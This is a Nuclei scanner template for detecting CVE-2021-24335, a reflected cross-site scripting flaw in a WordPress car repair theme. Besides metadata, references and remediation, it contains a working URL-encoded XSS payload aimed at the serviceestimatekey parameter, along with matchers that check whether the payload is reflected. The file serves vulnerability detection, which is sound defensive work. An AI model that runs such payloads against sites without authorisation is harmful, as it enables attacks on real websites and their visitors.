51 lines
2.1 KiB
YAML
51 lines
2.1 KiB
YAML
id: CVE-2021-24335
|
|
|
|
info:
|
|
name: WordPress Car Repair Services & Auto Mechanic Theme <4.0 - Cross-Site Scripting
|
|
author: daffainfo
|
|
severity: medium
|
|
description: WordPress Car Repair Services & Auto Mechanic before 4.0 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the serviceestimatekey parameter before outputting it back in the page.
|
|
remediation: |
|
|
Update to the latest version of the WordPress Car Repair Services & Auto Mechanic Theme (version 4.0 or higher) to mitigate the XSS vulnerability.
|
|
reference:
|
|
- https://themeforest.net/item/car-repair-services-auto-mechanic-wordpress-theme/19823557
|
|
- https://m0ze.ru/vulnerability/[2021-02-12]-[WordPress]-[CWE-79]-Car-Repair-Services-WordPress-Theme-v3.9.txt
|
|
- https://wpscan.com/vulnerability/39258aba-2449-4214-a490-b8e46945117d
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24335
|
|
- https://m0ze.ru/vulnerability/%5B2021-02-12%5D-%5BWordPress%5D-%5BCWE-79%5D-Car-Repair-Services-WordPress-Theme-v3.9.txt
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2021-24335
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00163
|
|
epss-percentile: 0.52865
|
|
cpe: cpe:2.3:a:smartdatasoft:car_repair_services_\&_auto_mechanic:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: smartdatasoft
|
|
product: car_repair_services_\&_auto_mechanic
|
|
framework: wordpress
|
|
tags: cve,cve2021,wordpress,xss,wp-plugin,wpscan
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "</script><script>alert(document.domain)</script>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a004630440220429c90bf4a87006f4fb7b1c9352562c0e2430d98195745df86251fbe8d0120a202206932a35f5a4e7211830c139c1f5f62247585261b7f64e5862ec8c915883095f2:922c64590222798bb761d5b6d8e72950 |